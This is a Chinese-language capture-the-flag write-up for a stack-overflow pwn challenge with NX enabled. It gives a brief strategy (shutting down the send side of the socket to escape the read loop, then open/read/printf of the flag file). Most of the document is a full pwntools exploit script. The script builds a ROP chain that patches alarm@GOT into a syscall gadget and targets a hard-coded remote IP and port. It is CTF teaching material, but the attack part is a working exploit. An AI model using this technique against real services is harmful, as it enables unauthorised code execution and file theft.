1.题目
1.1.保护机制
开启nx
1.2.关键代码
2.思路
重点1:可以看出这是一个很简单的栈溢出,但第一个问题是服务端的读取循环是个死循环。如果直接使用close()函数,程序会直接退出;查阅资料后发现pwn库中提供了shutdown()函数,它默认只关闭我们这一端的发送方向(连接本身仍然保持打开),即让循环正常退出、函数返回并执行ROP链,同时我们还能收到后面的输出
重点3:然后使用open系统调用打开文件流,再用read函数读取(fd是3,0,1,2已经分别被标准输入、标准输出、标准错误所占用),然后使用printf输出
from pwn import *
from ctypes import *
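# Exploit for the challenge binary: stack overflow -> ROP chain that turns
# alarm@GOT into a syscall gadget, open()s the flag file, read()s it into .bss
# and printf()s it back.  Target host/port, gadget addresses and the .bss /
# string addresses are copied from the writeup and were not re-verified here
# (the fixed 0x40xxxx addresses imply the binary is not PIE).
context(arch="amd64", os="linux", log_level="debug")  # "amd" is not a valid pwntools arch
con = remote('111.200.241.244', 50865)
elf = ELF('./pwn')

# ROP gadgets (from the writeup; TODO re-check with ROPgadget/ropper).
pop_rdi = 0x4008a3        # pop rdi ; ret
pop_rsi_r15 = 0x4008a1    # pop rsi ; pop r15 ; ret
pop_rdx = 0x4006fe        # presumably pop rdx ; ret
pop_rax = 0x4006fc        # presumably pop rax ; ret
add_prdi_al = 0x40070d    # add byte ptr [rdi], al ; ret -- used to patch the GOT in place
offset = 0x5              # libc's alarm+5 is expected to be `syscall ; ret`

alarm_got = elf.got['alarm']
alarm_plt = elf.plt['alarm']
printf_addr = elf.plt['printf']
read_addr = elf.plt['read']
flag_addr = 0x601058      # address of the "flag" filename string inside the binary
n_sys_open = 0x2          # __NR_open on x86-64
O_RDONLY = 0x0
bss_addr = 0x601070       # writable scratch buffer for the flag contents
fd = 0x3                  # first free descriptor after stdin/stdout/stderr

# 56 bytes of padding reach the saved return address (buffer + saved rbp).
# Everything is built as bytes so it works the same on Python 2 and 3
# (str + p64() raises TypeError on Python 3).
payload = b"A" * 56
# 1) alarm@GOT += 5: after this alarm@plt jumps to `syscall ; ret` in libc.
#    This relies on the low byte of the resolved alarm address not carrying
#    over when 5 is added (add [rdi], al only touches one byte).
payload += p64(pop_rax) + p64(offset) + p64(pop_rdi) + p64(alarm_got) + p64(add_prdi_al)
# 2) open("flag", O_RDONLY) through the patched PLT entry (rax = SYS_open,
#    rdi = filename, rsi = flags; mode in rdx is irrelevant for O_RDONLY).
payload += p64(pop_rax) + p64(n_sys_open) + p64(pop_rdi) + p64(flag_addr)
payload += p64(pop_rsi_r15) + p64(O_RDONLY) + p64(0x0) + p64(alarm_plt)
# 3) read(fd, bss_addr, 0x50) -- the new file gets fd 3.
payload += p64(pop_rdi) + p64(fd) + p64(pop_rsi_r15) + p64(bss_addr) + p64(0x0)
payload += p64(pop_rdx) + p64(0x50) + p64(read_addr)
# 4) printf(bss_addr): the flag bytes are used as the format string, so a '%'
#    inside the flag would garble the output -- acceptable for a CTF flag.
payload += p64(pop_rdi) + p64(bss_addr) + p64(printf_addr)
# The service reads exactly the announced length, so pad to 0x200.
payload = payload.ljust(0x200, b"A")

con.sendlineafter(b"server!\n", str(0x200).encode())
con.send(payload)
con.recv()   # drain whatever the service echoes back (kept from the original flow)
# The read loop only ends once our side stops sending; shutdown() closes the
# send direction only, so the overwritten return address is used while the
# receive side stays open for the flag.
con.shutdown()
con.interactive()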